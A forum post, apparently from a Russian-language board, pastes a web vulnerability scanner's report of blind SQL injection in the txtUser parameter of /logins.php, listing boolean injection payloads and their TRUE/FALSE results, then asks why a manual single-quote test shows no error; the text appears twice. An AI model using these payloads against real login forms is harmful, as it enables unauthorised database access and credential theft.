WoG
05.02.2016, 01:00
HTML highlight
Blind SQL Injection
Vulnerability description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /logins.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input txtUser was set to -1' OR 3*2*1=6 AND 000224=000224 --
Tests performed:
-1' OR 2+224-224-1=0+0+0+1 -- => TRUE
-1' OR 3+224-224-1=0+0+0+1 -- => FALSE
-1' OR 3*2 FALSE
-1' OR 3*2>(0+5+224-224) -- => FALSE
-1' OR 2+1-1-1=1 AND 000224=000224 -- => TRUE
-1' OR 000224=000224 AND 3+1-1-1=1 -- => FALSE
-1' OR 3*2=5 AND 000224=000224 -- => FALSE
-1' OR 3*2=6 AND 000224=000224 -- => TRUE
-1' OR 3*2*0=6 AND 000224=000224 -- => FALSE
-1' OR 3*2*1=6 AND 000224=000224 -- => TRUE
Пробую вот так
/logins.php?txtUser=1'
Ошибки нет,подскажите что делаю не так
Blind SQL Injection
Vulnerability description
This script is possibly vulnerable to SQL Injection attacks.
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /logins.php.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
URL encoded POST input txtUser was set to -1' OR 3*2*1=6 AND 000224=000224 --
Tests performed:
-1' OR 2+224-224-1=0+0+0+1 -- => TRUE
-1' OR 3+224-224-1=0+0+0+1 -- => FALSE
-1' OR 3*2 FALSE
-1' OR 3*2>(0+5+224-224) -- => FALSE
-1' OR 2+1-1-1=1 AND 000224=000224 -- => TRUE
-1' OR 000224=000224 AND 3+1-1-1=1 -- => FALSE
-1' OR 3*2=5 AND 000224=000224 -- => FALSE
-1' OR 3*2=6 AND 000224=000224 -- => TRUE
-1' OR 3*2*0=6 AND 000224=000224 -- => FALSE
-1' OR 3*2*1=6 AND 000224=000224 -- => TRUE
Пробую вот так
/logins.php?txtUser=1'
Ошибки нет,подскажите что делаю не так